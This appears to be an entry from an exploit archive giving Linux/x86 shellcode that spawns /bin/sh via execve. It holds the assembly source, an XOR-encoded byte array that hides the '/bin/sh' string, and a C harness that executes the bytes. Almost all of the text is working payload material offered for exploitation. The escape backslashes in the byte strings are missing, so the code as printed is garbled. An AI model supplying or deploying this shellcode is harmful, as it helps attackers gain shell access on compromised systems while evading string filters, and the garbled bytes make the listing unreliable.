[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : linux/x86 execve /bin/sh xor encrypted 55 bytes
# Published : 2004-09-12
# Author : n/a
# Previous Title : linux/x86 break chroot execve /bin/sh 80 bytes
# Next Title : linux/x86 execve /bin/sh tolower() evasion 41 bytes
/*
.file "xor-encrypted shellcode"
.version "1.0"
.text
.align 4
.globl main
.type main,@function
_start:
xorl %eax,%eax
jmp 0x22
popl %ebx
movl 8(%ebx),%edx
xor %edx,(%ebx)
xor %edx,4(%ebx)
xor %edx,%edx
movl %ebx,0x8(%esp)
movl %edx,0xc(%esp)
movb $0xb,%al
leal 0x8(%esp),%ecx
int $0x80
xorl %ebx,%ebx
movl %ebx,%eax
incl %eax
int $0x80
call -0x27
.string "x6ex23x28x2fx6ex32x29x41x41x41x41x41"
*/
#define NAME "encrypted"
char code[]=
"x31xc0xebx22x5bx8bx53x08x31x13x31x53x04x31xd2x89"
"x5cx24x08x89x54x24x0cxb0x0bx8dx4cx24x08xcdx80x31"
"xdbx89xd8x40xcdx80xe8xd9xffxffxff"
"x6ex23x28x2fx6ex32x29x41" /* encrypted "/bin/sh" */
"x41x41x41x41"; /* Conversion chars */
main()
{
int (*funct)();
funct = (int (*)()) code;
printf("%s shellcodentSize = %dn",NAME,strlen(code));
(int)(*funct)();
}
// www.Syue.com [2004-09-12]